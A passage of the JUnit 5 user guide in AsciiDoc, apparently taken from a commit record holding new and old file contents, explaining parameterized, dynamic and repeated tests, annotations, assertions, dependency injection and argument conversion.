second=2 \u2714\n\u2514\u2500 3 ==> first='baz, qux', second=3 \u2714\n....\n\nThe following placeholders are supported within custom display names.\n\n[cols=\"20,80\"]\n|===\n| Placeholder | Description\n\n| `{index}` | the current invocation index (1-based)\n| `{arguments}` | the complete, comma-separated arguments list\n| `{0}`, `{1}`, ... | an individual argument\n|===\n\n\n[[writing-tests-parameterized-tests-lifecycle-interop]]\n==== Lifecycle and Interoperability\n\nEach invocation of a parameterized test has the same lifecycle as a regular `@Test`\nmethod. For example, `@BeforeEach` methods will be executed before each invocation.\nSimilar to <<writing-tests-dynamic-tests>>, invocations will appear one by one in the\ntest tree of an IDE. You may at will mix regular `@Test` methods and `@ParameterizedTest`\nmethods within the same test class.\n\nYou may use `ParameterResolver` extensions with `@ParameterizedTest` methods. However, method\nparameters that are resolved by argument sources need to come first in the argument list.\nSince a test class may contain regular tests as well as parameterized tests with different\nparameter lists, values from argument sources are not resolved for lifecycle methods (e.g.\n`@BeforeEach`) and test class constructors.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ParameterResolver_example]\n----\n\n\n[[writing-tests-dynamic-tests]]\n=== Dynamic Tests\n\nThe standard `@Test` annotation in JUnit Jupiter described in <<writing-tests-annotations>>\nis very similar to the `@Test` annotation in JUnit 4.\nBoth describe methods that implement test cases.\nThese test cases are static in the sense that they are fully specified at compile time,\nand their behavior cannot be changed by anything happening at runtime.\n_Assumptions provide a basic form of dynamic behavior but are intentionally rather limited in their expressiveness._\n\nIn addition to these standard tests a completely new kind of test programming model has been introduced in JUnit Jupiter.\nThis new kind of test is a _dynamic test_ which is generated at runtime by a factory method\nthat is annotated with `@TestFactory`.\n\nIn contrast to `@Test` methods, a `@TestFactory` method is not itself a test case but rather a factory for test cases.\nThus, a dynamic test is the product of a factory.\nTechnically speaking, a `@TestFactory` method must return a `Stream`,\n`Collection`, `Iterable`, or `Iterator` of `DynamicNode` instances.\nInstantiable subclasses of `DynamicNode` are `DynamicContainer` and `DynamicTest`.\n`DynamicContainer` instances are composed of a _display name_ and a list of dynamic child nodes,\nenabling the creation of arbitrarily nested hierarchies of dynamic nodes.\n`DynamicTest` instances will then be executed lazily,\nenabling dynamic and even non-deterministic generation of test cases.\n\nAny `Stream` returned by a `@TestFactory` will be properly closed by calling `stream.close()`,\nmaking it safe to use a resource such as `Files.lines()`.\n\nAs with `@Test` methods, `@TestFactory` methods must not be `private` or `static`\nand may optionally declare parameters to be resolved by `ParameterResolvers`.\n\nA `DynamicTest` is a test case generated at runtime.\nIt is composed of a _display name_ and an `Executable`. `Executable` is a `@FunctionalInterface`\nwhich means that the implementations of dynamic tests can be provided as _lambda expressions_\nor _method references_.\n\n.Dynamic Test Lifecycle\nWARNING: The execution lifecycle of a dynamic test is quite different than it is for a\nstandard `@Test` case. Specifically, there are no lifecycle callbacks for individual\ndynamic tests. This means that `@BeforeEach` and `@AfterEach` methods and their corresponding\nextension callbacks are executed for the `@TestFactory` method but not for each _dynamic test_.\nIn other words, if you access fields from the test instance within a lambda expression for\na dynamic test, those fields will not be reset by callback methods or extensions between\nthe execution of individual dynamic tests generated by the same `@TestFactory` method.\n\nAs of JUnit Jupiter {jupiter-version}, dynamic tests must always be created by factory\nmethods; however, this might be complemented by a registration facility in a later\nrelease.\n\n[[writing-tests-dynamic-tests-examples]]\n==== Dynamic Test Examples\n\nThe following `DynamicTestsDemo` class demonstrates several examples of test factories and dynamic tests.\n\nThe first method returns an invalid return type. Since an invalid return type cannot be\ndetected at compile time, a `JUnitException` is thrown when it is detected at runtime.\n\nThe next five methods are very simple examples that demonstrate the generation of a\n`Collection`, `Iterable`, `Iterator`, or `Stream` of `DynamicTest` instances.\nMost of these examples do not really exhibit dynamic behavior\nbut merely demonstrate the supported return types in principle.\nHowever, `dynamicTestsFromStream()` and `dynamicTestsFromIntStream()` demonstrate how\neasy it is to generate dynamic tests for a given set of strings or a range of input numbers.\n\nThe next method is truly dynamic in nature.\n`generateRandomNumberOfTests()` implements an `Iterator` that generates random numbers, a\ndisplay name generator, and a test executor and then provides all three to `DynamicTest.stream()`.\nAlthough the non-deterministic behavior of `generateRandomNumberOfTests()` is of course in conflict with\ntest repeatability and should thus be used with care, it serves to demonstrate the expressiveness\nand power of dynamic tests.\n\nThe last method generates a nested hierarchy of dynamic tests utilizing `DynamicContainer`.\n\n[source,java]\n----\ninclude::{testDir}\/example\/DynamicTestsDemo.java[tags=user_guide]\n----\n","old_contents":"[[writing-tests]]\n== Writing Tests\n\n[source,java,indent=0]\n.A first test case\n----\ninclude::{testDir}\/example\/FirstJUnit5Tests.java[tags=user_guide]\n----\n\n[[writing-tests-annotations]]\n=== Annotations\n\nJUnit Jupiter supports the following annotations for configuring tests and extending the framework.\n\nAll core annotations are located in the `{api-package}` package in the `junit-jupiter-api`\nmodule.\n\n[cols=\"20,80\"]\n|===\n| Annotation | Description\n\n| `@Test` | Denotes that a method is a test method. Unlike JUnit 4's `@Test` annotation, this annotation does not declare any attributes, since test extensions in JUnit Jupiter operate based on their own dedicated annotations.\n| `@RepeatedTest` | Denotes that a method is a test template for a <<writing-tests-repeated-tests, repeated test>>\n| `@TestFactory` | Denotes that a method is a test factory for <<writing-tests-dynamic-tests, dynamic tests>>\n| `@DisplayName` | Declares a custom display name for the test class or test method\n| `@BeforeEach` | Denotes that the annotated method should be executed _before_ *each* `@Test` method in the current class; analogous to JUnit 4's `@Before`. Such methods are _inherited_.\n| `@AfterEach` | Denotes that the annotated method should be executed _after_ *each* `@Test` method in the current class; analogous to JUnit 4's `@After`. Such methods are _inherited_.\n| `@BeforeAll` | Denotes that the annotated method should be executed _before_ *all* `@Test` methods in the current class; analogous to JUnit 4's `@BeforeClass`. Such methods must be `static` and are _inherited_.\n| `@AfterAll` | Denotes that the annotated method should be executed _after_ *all* `@Test` methods in the current class; analogous to JUnit 4's `@AfterClass`. Such methods must be `static` and are _inherited_.\n| `@Nested` | Denotes that the annotated class is a nested, non-static test class. Due to restrictions of the Java language, `@BeforeAll` and `@AfterAll` methods cannot be used in a `@Nested` test class.\n| `@Tag` | Used to declare _tags_ for filtering tests, either at the class or method level; analogous to test groups in TestNG or Categories in JUnit 4\n| `@Disabled` | Used to _disable_ a test class or test method; analogous to JUnit 4's `@Ignore`\n| `@ExtendWith` | Used to register custom <<extensions,extensions>>\n|===\n\n[[writing-tests-meta-annotations]]\n==== Meta-Annotations and Composed Annotations\n\nJUnit Jupiter annotations can be used as _meta-annotations_. That means that you can define\nyour own _composed annotation_ that will automatically _inherit_ the semantics of its\nmeta-annotations.\n\nFor example, instead of copying and pasting `@Tag(\"fast\")` throughout your code base (see\n<<writing-tests-tagging-and-filtering>>), you can create a custom _composed annotation_ named `@Fast`\nas follows. `@Fast` can then be used as a drop-in replacement for `@Tag(\"fast\")`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/Fast.java[tags=user_guide]\n----\n\n[[writing-tests-standard]]\n=== Standard Test Class\n\n[source,java,indent=0]\n.A standard test case\n----\ninclude::{testDir}\/example\/StandardTests.java[tags=user_guide]\n----\n\nNOTE: Neither test classes nor test methods need to be `public`.\n\n[[writing-tests-display-names]]\n=== Display Names\n\nTest classes and test methods can declare custom display names -- with spaces, special\ncharacters, and even emojis -- that will be displayed by test runners and test reporting.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisplayNameDemo.java[tags=user_guide]\n----\n\n[[writing-tests-assertions]]\n=== Assertions\n\nJUnit Jupiter comes with many of the assertion methods that JUnit 4 has and adds a few\nthat lend themselves well to being used with Java 8 lambdas. All JUnit Jupiter assertions\nare `static` methods in the `{Assertions}` class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/AssertionsDemo.java[tags=user_guide]\n----\n\n[[writing-tests-assertions-third-party]]\n==== Third-party Assertion Libraries\n\nEven though the assertion facilities provided by JUnit Jupiter are sufficient for many\ntesting scenarios, there are times when more power and additional functionality such as\n_matchers_ are desired or required. In such cases, the JUnit team recommends the use of\nthird-party assertion libraries such as {AssertJ}, {Hamcrest}, {Truth}, etc. Developers\nare therefore free to use the assertion library of their choice.\n\nFor example, the combination of _matchers_ and a fluent API can be used to make\nassertions more descriptive and readable. However, JUnit Jupiter's `{Assertions}` class\ndoes not provide an\nhttp:\/\/junit.org\/junit4\/javadoc\/latest\/org\/junit\/Assert.html#assertThat[`assertThat()`]\nmethod like the one found in JUnit 4's `org.junit.Assert` class which accepts a Hamcrest\nhttp:\/\/junit.org\/junit4\/javadoc\/latest\/org\/hamcrest\/Matcher.html[`Matcher`]. Instead,\ndevelopers are encouraged to use the built-in support for matchers provided by third-party\nassertion libraries.\n\nThe following example demonstrates how to use the `assertThat()` support from Hamcrest in\na JUnit Jupiter test. As long as the Hamcrest library has been added to the classpath,\nyou can statically import methods such as `assertThat()`, `is()`, and `equalTo()` and\nthen use them in tests like in the `assertWithHamcrestMatcher()` method below.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/HamcrestAssertionDemo.java[tags=user_guide]\n----\n\nNaturally, legacy tests based on the JUnit 4 programming model can continue using\n`org.junit.Assert#assertThat`.\n\n[[writing-tests-assumptions]]\n=== Assumptions\n\nJUnit Jupiter comes with a subset of the assumption methods that JUnit 4 provides and adds a\nfew that lend themselves well to being used with Java 8 lambdas. All JUnit Jupiter assumptions\nare static methods in the `{Assumptions}` class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/AssumptionsDemo.java[tags=user_guide]\n----\n\n[[writing-tests-disabling]]\n=== Disabling Tests\n\nHere's a disabled test case.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisabledClassDemo.java[tags=user_guide]\n----\n\nAnd here's a test case with a disabled test method.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisabledTestsDemo.java[tags=user_guide]\n----\n\n[[writing-tests-tagging-and-filtering]]\n=== Tagging and Filtering\n\nTest classes and methods can be tagged. Those tags can later be used to filter\n<<running-tests,test discovery and execution>>.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TaggingDemo.java[tags=user_guide]\n----\n\n\n[[writing-tests-nested]]\n=== Nested Tests\n\nNested tests give the test writer more capabilities to express the relationship among\nseveral group of tests. Here's an elaborate example.\n\n[source,java,indent=0]\n.Nested test suite for testing a stack\n----\ninclude::{testDir}\/example\/TestingAStackDemo.java[tags=user_guide]\n----\n\nNOTE: _Only non-static nested classes_ (i.e. _inner classes_) can serve as\n`@Nested` tests. Nesting can be arbitrarily deep, and those inner classes are considered\nto be full members of the test class family with one exception: `@BeforeAll` and\n`@AfterAll` do not work, because Java does not allow `static` members in inner classes.\n\n[[writing-tests-dependency-injection]]\n=== Dependency Injection for Constructors and Methods\n\nIn all prior JUnit versions, test constructors or methods were not allowed to have\nparameters (at least not with the standard `Runner` implementations). As one of the major\nchanges in JUnit Jupiter, both test constructors and methods are now permitted to have\nparameters. This allows for greater flexibility and enables _Dependency Injection_ for\nconstructors and methods.\n\n`{ParameterResolver}` defines the API for test extensions that wish to _dynamically_\nresolve parameters at runtime. If a test constructor or a `@Test`, `@TestFactory`,\n`@BeforeEach`, `@AfterEach`, `@BeforeAll`, or `@AfterAll` method accepts a parameter, the\nparameter must be resolved at runtime by a registered `ParameterResolver`.\n\nThere are currently three built-in resolvers that are registered automatically.\n\n* `{TestInfoParameterResolver}`: if a method parameter is of type `{TestInfo}`, the\n `TestInfoParameterResolver` will supply an instance of `TestInfo` corresponding to the\n current test as the value for the parameter. The `TestInfo` can then be used to retrieve\n information about the current test such as the test's display name, the test class, the\n test method, or associated tags. The display name is either a technical name, such as\n the name of the test class or test method, or a custom name configured via `@DisplayName`.\n+\n`{TestInfo}` acts as a drop-in replacement for the `TestName` rule from JUnit 4. The\nfollowing demonstrates how to have `TestInfo` injected into a test constructor,\n`@BeforeEach` method, and `@Test` method.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TestInfoDemo.java[tags=user_guide]\n----\n\n* `RepetitionInfoParameterResolver`: if a method parameter in a `@RepeatedTest`,\n `@BeforeEach`, or `@AfterEach` method is of type `{RepetitionInfo}`, the\n `RepetitionInfoParameterResolver` will supply an instance of `RepetitionInfo`.\n `RepetitionInfo` can then be used to retrieve information about the current repetition\n and the total number of repetitions for the corresponding `@RepeatedTest`. Note,\n however, that `RepetitionInfoParameterResolver` is not registered outside the context\n of a `@RepeatedTest`. See <<writing-tests-repeated-tests-examples>>.\n\n* `{TestReporterParameterResolver}`: if a method parameter is of type `{TestReporter}`, the\n `TestReporterParameterResolver` will supply an instance of `TestReporter`.\n The `TestReporter` can be used to publish additional data about the current test run.\n The data can be consumed through `{TestExecutionListener}.reportingEntryPublished()` and thus\n be viewed by IDEs or included in reports.\n+\nIn JUnit Jupiter you should use `TestReporter` where\nyou used to print information to `stdout` or `stderr` in JUnit 4.\nUsing `@RunWith(JUnitPlatform.class)` will even output all reported entries to `stdout`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TestReporterDemo.java[tags=user_guide]\n----\n\nNOTE: Other parameter resolvers must be explicitly enabled by registering appropriate\n<<extensions,extensions>> via `@ExtendWith`.\n\nCheck out the `{MockitoExtension}` for an example of a custom `{ParameterResolver}`.\nWhile not intended to be production-ready, it demonstrates the simplicity and\nexpressiveness of both the extension model and the parameter resolution process.\n`MyMockitoTest` demonstrates how to inject Mockito mocks into `@BeforeEach` and `@Test`\nmethods.\n\n[source,java,indent=0]\n----\nimport static org.junit.jupiter.api.Assertions.assertEquals;\nimport static org.mockito.Mockito.when;\n\nimport org.junit.jupiter.api.BeforeEach;\nimport org.junit.jupiter.api.Test;\nimport org.junit.jupiter.api.extension.ExtendWith;\nimport org.mockito.Mock;\nimport com.example.Person;\nimport com.example.mockito.MockitoExtension;\n\n@ExtendWith(MockitoExtension.class)\nclass MyMockitoTest {\n\n\t@BeforeEach\n\tvoid init(@Mock Person person) {\n\t\twhen(person.getName()).thenReturn(\"Dilbert\");\n\t}\n\n\t@Test\n\tvoid simpleTestWithInjectedMock(@Mock Person person) {\n\t\tassertEquals(\"Dilbert\", person.getName());\n\t}\n\n}\n----\n\n[[writing-tests-test-interfaces-and-default-methods]]\n=== Test Interfaces and Default Methods\n\nJUnit Jupiter allows `@Test`, `@TestFactory`, `@BeforeEach`, and `@AfterEach` to be\ndeclared on interface default methods. In addition, `@BeforeAll` and `@AfterAll` can be\ndeclared on static methods in a test interface, while `@ExtendWith` and `@Tag` can be\ndeclared on test interfaces to configure extensions and tags. Here are some examples.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestLifecycleLogger.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestInterfaceDynamicTestsDemo.java[tags=user_guide]\n----\n\n`@ExtendWith` and `@Tag` can be declared on a test interface so that classes that\nimplement it automatically inherit its tags and extensions. See\n<<extensions-lifecycle-callbacks-before-after-execution>> for the source code of the\n<<extensions-lifecycle-callbacks-timing-extension, TimingExtension>>.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TimeExecutionLogger.java[tags=user_guide]\n----\n\nIn your test class you can then implement these test interfaces to have them applied.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestInterfaceDemo.java[tags=user_guide]\n----\n\nRunning the `TestInterfaceDemo` results in output similar to the following:\n\n....\n:junitPlatformTest\nINFO example.TestLifecycleLogger - Before all tests\nINFO example.TestLifecycleLogger - About to execute [dynamicTestsFromCollection()]\nINFO example.TimingExtension - Method [dynamicTestsFromCollection] took 13 ms.\nINFO example.TestLifecycleLogger - Finished executing [dynamicTestsFromCollection()]\nINFO example.TestLifecycleLogger - About to execute [isEqualValue()]\nINFO example.TimingExtension - Method [isEqualValue] took 1 ms.\nINFO example.TestLifecycleLogger - Finished executing [isEqualValue()]\nINFO example.TestLifecycleLogger - After all tests\n\nTest run finished after 190 ms\n[ 3 containers found ]\n[ 0 containers skipped ]\n[ 3 containers started ]\n[ 0 containers aborted ]\n[ 3 containers successful ]\n[ 0 containers failed ]\n[ 3 tests found ]\n[ 0 tests skipped ]\n[ 3 tests started ]\n[ 0 tests aborted ]\n[ 3 tests successful ]\n[ 0 tests failed ]\n\nBUILD SUCCESSFUL\n....\n\nAnother possible application of this feature is to write tests for interface contracts.\nFor example, you can write tests for how implementations of `Object.equals` or\n`Comparable.compareTo` should behave as follows.\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/Testable.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/EqualsContract.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/ComparableContract.java[tags=user_guide]\n----\n\nIn your test class you can then implement both contract interfaces thereby inheriting the\ncorresponding tests. Of course you'll have to implement the abstract methods.\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/StringTests.java[tags=user_guide]\n----\n\nThe above tests are merely meant as examples and therefore not complete.\n\n\n[[writing-tests-repeated-tests]]\n=== Repeated Tests\n\nJUnit Jupiter provides the ability to repeat a test a specified number of times simply by\nannotating a method with `@RepeatedTest` and specifying the total number of repetitions\ndesired. Each invocation of a repeated test behaves like the execution of a regular\n`@Test` method with full support for the same lifecycle callbacks and extensions.\n\nThe following example demonstrates how to declare a test named `repeatedTest()` that\nwill be automatically repeated 10 times.\n\n[source,java]\n----\n@RepeatedTest(10)\nvoid repeatedTest() {\n\t\/\/ ...\n}\n----\n\nIn addition to specifying the number of repetitions, a custom display name can be\nconfigured for each repetition via the `name` attribute of the `@RepeatedTest`\nannotation. Furthermore, the display name can be a pattern composed of a combination of\nstatic text and dynamic placeholders. The following placeholders are currently supported.\n\n- `{displayName}`: display name of the `@RepeatedTest` method\n- `{currentRepetition}`: the current repetition count\n- `{totalRepetitions}`: the total number of repetitions\n\nThe default display name for a given repetition is generated based on the following\npattern: `\"repetition {currentRepetition} of {totalRepetitions}\"`. Thus, the display\nnames for individual repetitions of the previous `repeatedTest()` example would be:\n`repetition 1 of 10`, `repetition 2 of 10`, etc. If you would like the display name of\nthe `@RepeatedTest` method included in the name of each repetition, you can define your\nown custom pattern or use the predefined `RepeatedTest.LONG_DISPLAY_NAME` pattern. The\nlatter is equal to `\"{displayName} :: repetition {currentRepetition} of\n{totalRepetitions}\"` which results in display names for individual repetitions like\n`repeatedTest() :: repetition 1 of 10`, `repeatedTest() :: repetition 2 of 10`, etc.\n\nIn order to retrieve information about the current repetition and the total number of\nrepetitions programmatically, a developer can choose to have an instance of\n`RepetitionInfo` injected into a `@RepeatedTest`, `@BeforeEach`, or `@AfterEach` method.\n\n[[writing-tests-repeated-tests-examples]]\n==== Repeated Test Examples\n\nThe `RepeatedTestsDemo` class at the end of this section demonstrates several examples of\nrepeated tests.\n\nThe `repeatedTest()` method is identical to example from the previous section; whereas,\n`repeatedTestWithRepetitionInfo()` demonstrates how to have an instance of\n`RepetitionInfo` injected into a test to access the total number of repetitions for the\ncurrent repeated test.\n\nThe next two methods demonstrate how to include a custom `@DisplayName` for the\n`@RepeatedTest` method in the display name of each repetition. `customDisplayName()`\ncombines a custom display name with a custom pattern and then uses `TestInfo` to verify\nthe format of the generated display name. `Repeat!` is the `{displayName}` which comes\nfrom the `@DisplayName` declaration, and `1\/1` comes from\n`{currentRepetition}\/{totalRepetitions}`. In contrast,\n`customDisplayNameWithLongPattern()` uses the aforementioned predefined\n`RepeatedTest.LONG_DISPLAY_NAME` pattern.\n\n`repeatedTestInGerman()` demonstrates the ability to translate display names of repeated\ntests into foreign languages -- in this case German, resulting in names for individual\nrepetitions such as: `Wiederholung 1 von 5`, `Wiederholung 2 von 5`, etc.\n\nSince the `beforeEach()` method is annotated with `@BeforeEach` it will get executed\nbefore each repetition of each repeated test. By having the `TestInfo` and\n`RepetitionInfo` injected into the method, we see that it's possible to obtain\ninformation about the currently executing repeated test. Executing `RepeatedTestsDemo`\nwith the `INFO` log level enabled results in the following output.\n\n....\nINFO: About to execute repetition 1 of 10 for repeatedTest\nINFO: About to execute repetition 2 of 10 for repeatedTest\nINFO: About to execute repetition 3 of 10 for repeatedTest\nINFO: About to execute repetition 4 of 10 for repeatedTest\nINFO: About to execute repetition 5 of 10 for repeatedTest\nINFO: About to execute repetition 6 of 10 for repeatedTest\nINFO: About to execute repetition 7 of 10 for repeatedTest\nINFO: About to execute repetition 8 of 10 for repeatedTest\nINFO: About to execute repetition 9 of 10 for repeatedTest\nINFO: About to execute repetition 10 of 10 for repeatedTest\nINFO: About to execute repetition 1 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 2 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 3 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 4 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 5 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 1 of 1 for customDisplayName\nINFO: About to execute repetition 1 of 1 for customDisplayNameWithLongPattern\nINFO: About to execute repetition 1 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 2 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 3 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 4 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 5 of 5 for repeatedTestInGerman\n....\n\n[source,java]\n----\ninclude::{testDir}\/example\/RepeatedTestsDemo.java[tags=user_guide]\n----\n\nWhen using the `ConsoleLauncher` or the `junitPlatformTest` Gradle plugin with the\nunicode theme enabled, execution of `RepeatedTestsDemo` results in the following output\nto the console.\n\n....\n\u251c\u2500 RepeatedTestsDemo \u2714\n\u2502 \u251c\u2500 repeatedTest() \u2714\n\u2502 \u2502 \u251c\u2500 repetition 1 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 2 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 3 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 4 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 5 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 6 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 7 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 8 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 9 of 10 \u2714\n\u2502 \u2502 \u2514\u2500 repetition 10 of 10 \u2714\n\u2502 \u251c\u2500 repeatedTestWithRepetitionInfo(RepetitionInfo) \u2714\n\u2502 \u2502 \u251c\u2500 repetition 1 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 2 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 3 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 4 of 5 \u2714\n\u2502 \u2502 \u2514\u2500 repetition 5 of 5 \u2714\n\u2502 \u251c\u2500 Repeat! \u2714\n\u2502 \u2502 \u2514\u2500 Repeat! 1\/1 \u2714\n\u2502 \u251c\u2500 Details... \u2714\n\u2502 \u2502 \u2514\u2500 Details... :: repetition 1 of 1 \u2714\n\u2502 \u2514\u2500 repeatedTestInGerman() \u2714\n\u2502 \u251c\u2500 Wiederholung 1 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 2 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 3 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 4 von 5 \u2714\n\u2502 \u2514\u2500 Wiederholung 5 von 5 \u2714\n....\n\n\n[[writing-tests-parameterized-tests]]\n=== Parameterized Tests\n\nParameterized tests make it possible to run a test multiple times with different arguments. They are\ndeclared just like regular `@Test` methods but use the `@ParameterizedTest` annotation instead. In\naddition, you must declare at least one _source_ that will provide the arguments for each\ninvocation.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=first_example]\n----\n\nThis parameterized test uses the `@ValueSource` annotation to specify a `String` array as the source\nof arguments. When executing this method, each invocation will be reported separately. For instance,\nthe `ConsoleLauncher` will print output similar to the following.\n\n....\ntestWithStringParameter(String) \u2714\n\u251c\u2500 [1] Hello \u2714\n\u2514\u2500 [2] World \u2714\n....\n\n[[writing-tests-parameterized-tests-setup]]\n==== Required Setup\n\nIn order to use parameterized tests you need to add a dependency on the `junit-jupiter-params`\nartifact. Please refer to <<dependency-metadata>> for details.\n\n[[writing-tests-parameterized-tests-sources]]\n==== Sources of Arguments\n\nOut of the box, JUnit Jupiter provides quite a few _source_ annotations. Each of the\nfollowing subsections provides a brief overview and an example for each of them. Please\nrefer to the JavaDoc in the `{params-provider-package}` package for additional\ninformation.\n\n[[writing-tests-parameterized-tests-sources-ValueSource]]\n===== @ValueSource\n\n`@ValueSource` is one of the simplest possible sources. It lets you specify an array of literals of\nprimitive types (either `String`, `int`, `long`, or `double`) and can only be used for providing a\nsingle parameter per invocation.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ValueSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-EnumSource]]\n===== @EnumSource\n\n`@EnumSource` provides a convenient way to use `Enum` constants. The annotation provides an optional\n`names` parameter that lets you specify which constants shall be used. If omitted, all constants\nwill be used like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_include_example]\n----\n\nThe `@EnumSource` annotation also provides an optional `mode` parameter that enables\nfine-grained control over which constants are passed to the test method. For example, you\ncan exclude names from the enum constant pool or specify regular expressions as in the\nfollowing examples.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_exclude_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_regex_example]\n----\n\n[[writing-tests-parameterized-tests-sources-MethodSource]]\n===== @MethodSource\n\n`@MethodSource` allows you to refer to one or multiple methods of the test class. Each method must\nreturn a `Stream`, an `Iterable`, an `Iterator`, or an array of arguments. In addition, each method\nmust be `static` and must not accept any arguments.\n\nIf you only need a single parameter, you can return instances of the parameter type directly as\ndemonstrated by the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=simple_MethodSource_example]\n----\n\nStreams for primitive types (`DoubleStream`, `IntStream`, and `LongStream`) are also supported.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=primitive_MethodSource_example]\n----\n\nIn case you need multiple parameters, you need to return an `Arguments` instances as shown below.\nNote that `Arguments.of(Object...)` is a static factory method defined in the interface itself.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=multi_arg_MethodSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-CsvSource]]\n===== @CsvSource\n\n`@CsvSource` allows you to express argument lists as comma-separated values (i.e.,\n`String` literals).\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=CsvSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-CsvFileSource]]\n===== @CsvFileSource\n\n`@CsvFileSource` lets you use CSV files from the classpath. Each line from a CSV file\nresults in one invocation of the parameterized test.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=CsvFileSource_example]\n----\n\n[source,csv,indent=0]\n.two-column.csv\n----\ninclude::{testResourcesDir}\/two-column.csv[]\n----\n\n[[writing-tests-parameterized-tests-sources-ArgumentsSource]]\n===== @ArgumentsSource\n\n`@ArgumentsSource` can be used to specify a custom, reusable `ArgumentsProvider`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsSource_example]\n----\n\n\n[[writing-tests-parameterized-tests-argument-conversion]]\n==== Argument Conversion\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit]]\n===== Implicit Conversion\n\nTo support use cases like `@CsvSource`, JUnit Jupiter provides a number of built-in implicit\ntype converters. The conversion process depends on the declared type of each method parameter.\n\nFor example, if a `@ParameterizedTest` declares a parameter of type `TimeUnit` and the\nactual type supplied by the declared source is a `String`, the string will automatically\nbe converted into the corresponding `TimeUnit` enum constant.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_conversion_example]\n----\n\n`String` instances are currently implicitly converted to the following target types.\n\n[cols=\"10,90\"]\n|===\n| Target Type | Example\n\n| `boolean`\/`Boolean` | `\"true\"` \u2192 `true`\n| `byte`\/`Byte` | `\"1\"` \u2192 `(byte) 1`\n| `char`\/`Character` | `\"o\"` \u2192 `'o'`\n| `short`\/`Short` | `\"1\"` \u2192 `(short) 1`\n| `int`\/`Integer` | `\"1\"` \u2192 `1`\n| `long`\/`Long` | `\"1\"` \u2192 `1L`\n| `float`\/`Float` | `\"1.0\"` \u2192 `1.0f`\n| `double`\/`Double` | `\"1.0\"` \u2192 `1.0d`\n| `Enum` subclass | `\"SECONDS\"` \u2192 `TimeUnit.SECONDS`\n| `java.time.Instant` | `\"1970-01-01T00:00:00Z\"` \u2192 `Instant.ofEpochMilli(0)`\n| `java.time.LocalDate` | `\"2017-03-14\"` \u2192 `LocalDate.of(2017, 3, 14)`\n| `java.time.LocalDateTime` | `\"2017-03-14T12:34:56.789\"` \u2192 `LocalDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000)`\n| `java.time.LocalTime` | `\"12:34:56.789\"` \u2192 `LocalTime.of(12, 34, 56, 789_000_000)`\n| `java.time.OffsetDateTime` | 